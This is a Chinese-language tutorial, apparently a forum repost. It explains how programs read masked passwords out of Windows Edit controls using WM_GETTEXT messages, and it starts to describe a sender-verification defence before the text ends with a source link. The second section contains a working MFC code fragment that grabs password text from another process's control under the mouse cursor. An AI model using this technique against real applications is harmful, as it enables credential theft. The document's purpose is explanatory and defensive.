Edit控件是Windows的一個標準控件,當把其Password屬性設為True時,就會將輸入的內容屏蔽為星號,從而達到保護的目的。雖然我們 看來都是星號,但程序中的Edit控件實際仍是用戶輸入的密碼,應用程序可以獲取該控件中的密碼,其他應用程序也可以通過向其發送WM_GETTEXT或 EM_GETLINE消息來獲取Edit控件中的內容。黑客程序正是利用Edit控件的這個特性,當發現當前探測的窗口是Edit控件並且具有 ES_PASSWORD屬性時,則通過SendMessage向此窗口發送WM_GETTEXT或EM_GETLINE消息,這樣Edit框中的內容就一 目瞭然了。
二、黑客軟件工作方法:
首先要取得當前的窗口,並判斷是否是Edit控件,一般多通過鼠標來指定要探測的窗口,例如在WM_MOUSEMOVE消息的響應函數中進行判斷,現列舉代碼片段如下:
//將客戶坐標轉換成屏幕坐標
ClientToScreen(&point);
//返回一個包含指定屏幕坐標點的窗口
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
//獲取窗口句柄
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) != (::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
//獲取類名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
//判斷是否是Edit控件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
//獲取窗口風格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
//如果設置了ES_PASSWORD屬性
if (lStyle & ES_PASSWORD)
{
char szText[255];
//通過掌握的句柄hwndCurr向此控件發送WM_GETTEXT消息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText); //密碼已保存在szText中
m_strPassword = szText;
}
}
}
}
上述代碼中值得注意的有以下幾個關鍵地方:
ClientToScreen(&point);
CWnd* pWnd = CWnd::WindowFromPoint(point);
HWND hwndCurr = pWnd->GetSafeHwnd();
這三句代碼可以獲取當前鼠標位置所在窗口的窗口句柄,在SendMessage中要用到的。
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
這便是真正起作用的SendMessage了,其第一個參數指定了要接收消息的窗口句柄,我們已經通過上面的代碼獲取到了,第二個參數就是讓Edit控件返回字符的WM_GETTEXT消息了,並將得到的內容保存在szText中。
三、防範措施
既然我們搞清除了黑客軟件普遍採取的手法,那我們自然能制訂出一套防範其攻擊的措施來。下面我們就要對Password進行保護。
從以上分析我們可以看出:Edit控件的漏洞主要在於沒有對發送WM_GETTEXT或EM_GETLINE消息者的身份進行檢查,只要能找到Edit 窗口句柄,任何進程都可獲取其內容。所以必須要對發送消息者的身份進行驗證,這裡給出一種方法來驗證發送消息者的身份是否合法:
1.創建新CEdit類
從CEdit繼承一個子類CPasswordEdit,申明全局變量g_bSenderIdentity表明消息發送者的身份:
BOOL g_bSenderIdentity;
然後響應CWnd的虛函數DefWindowProc,在這個回調函數中進行身份驗證:
資料來源 http://bbs.tech.ccidnet.com/read.php?tid=544205
By smtk
全站熱搜
留言列表